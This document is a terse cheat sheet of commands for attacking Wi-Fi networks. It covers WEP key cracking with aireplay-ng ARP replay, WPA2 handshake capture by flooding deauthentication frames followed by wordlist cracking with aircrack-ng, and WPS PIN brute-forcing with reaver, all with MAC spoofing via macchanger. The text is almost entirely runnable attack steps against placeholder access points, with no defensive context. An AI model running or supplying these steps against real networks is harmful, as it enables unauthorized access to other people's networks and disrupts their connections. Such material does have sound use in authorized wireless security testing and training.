Wireless hacking

WEP - Brute-force key recovery

airmon-ng start wlan1
iwconfig
ifconfig wlan1mon down
macchanger -m 20:17:03:00:00:01 wlan1mon
ifconfig wlan1mon up
airodump-ng wlan1mon
airodump-ng --bssid 00:11:22:33:44:55 -c 4 -w WEPcrack wlan1mon
aireplay-ng -1 0 -a 00:11:22:33:44:55 wlan1mon

Keep aireplay-ng running in the background while we start to

aireplay-ng -3 -b 00:11:22:33:44:55 wlan1mon

With aireplay-ng running, start cracking the WEP key using:

aircrack-ng WEPcrack-01.cap

WPA2 - Crack using a wordlist

airmon-ng start wlan1
iwconfig
ifconfig wlan1mon down
macchanger -m 20:17:03:00:00:01 wlan1mon
ifconfig wlan1mon up
airodump-ng wlan1mon
airodump-ng --bssid 00:11:22:33:44:55 -c 4 -w WPAcrack wlan1mon

With airodump-ng running in another terminal

aireplay-ng --deauth 100 -a 00:11:22:33:44:55 wlan1mon

Keep replaying until you have captured the handshake (look for WPA Handshake in top right). Now we can crack the password using the captured handshake with a wordlist.

gunzip /usr/share/wordlists/rockyou.txt.gz
aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/fern-wifi/common.txt
aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/rockyou.txt

WPS - Brute-force PIN recovery

airmon-ng start wlan1
iwconfig
ifconfig wlan1mon down
macchanger -m 20:17:03:00:00:01 wlan1mon
ifconfig wlan1mon up
wash -i wlan1mon
reaver -i wlan1mon -b 00:11:22:33:44:55 -vvv -K 1